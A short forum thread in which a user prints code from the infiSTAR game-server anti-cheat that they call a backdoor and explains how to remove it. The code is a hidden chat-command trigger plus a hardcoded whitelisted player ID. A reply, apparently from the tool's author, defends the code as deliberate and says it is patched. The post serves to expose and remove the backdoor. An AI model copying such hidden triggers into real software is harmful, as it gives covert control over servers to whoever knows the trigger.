How to remove infiSTAR's backdoor

slittcer

Question

If you are someone that is constantly getting attacked by hackers and you're using infiSTAR's or blurgaming anti-hacks then here is a way to stop some of the hackers and remove the backdoor that infiSTAR has placed.

Remove these parts of code from the anti-hack

[] spawn {
waitUntil {sleep 1;((ctrlText ((findDisplay 24) displayCtrl 101)) == '.ban '+name player+' true;')};
disableSerialization;((findDisplay 24) displayCtrl 101) ctrlSetText '';(findDisplay 24) closeDisplay 0;
if (true) exitWith {"+_randvar12+" = [name player,getPlayerUID player];publicVariableServer '"+_randvar12+"';sleep 0.5;(findDisplay 46) closeDisplay 0;};
};

'"+_randvar12+"' addPublicVariableEventHandler
{
_array = _this select 1;
"+_randvar0+" = "+_randvar0+" + _array;publicVariable '"+_randvar0+"';
};
Change this
if (isNil '"+_randvar2+"') then {"+_randvar2+" = ['155767302'];};
to this
if (isNil '"+_randvar2+"') then {"+_randvar2+" = [];};

Hope this helps you combat those hackers!

11 answers to this question

That wasn't even a backdoor that was my front entrance. I don't know why some people suddenly start stepping out of the dark and acting like they are Saviour ^^. Even posting one of my pids here is like ~ aren't you guys thinking? There was a time where I was burning 30+ keys a day so releasing one of my Ids does what?

What so ever.

People that got something from me and have contact in a good behavior, will always get something new and better.

This is just out here because somebody decided to leak his version, that is why the trouble is out and nothing else.

All this has been patched.

#close request because nonesense and everything said at least 3 times on here 

You're only making your self look bad. I suggest not posting on this thread again unless you want to continue.